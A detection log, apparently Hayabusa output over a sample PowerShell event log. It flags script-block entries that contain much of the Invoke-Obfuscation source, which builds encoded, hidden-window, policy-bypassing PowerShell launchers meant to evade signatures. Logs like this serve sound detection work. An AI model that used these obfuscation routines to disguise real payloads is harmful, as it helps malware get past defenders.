@(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = 
$PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). 
#$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.279 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. 
All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ 
}${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ 
*}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? 
\""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. 
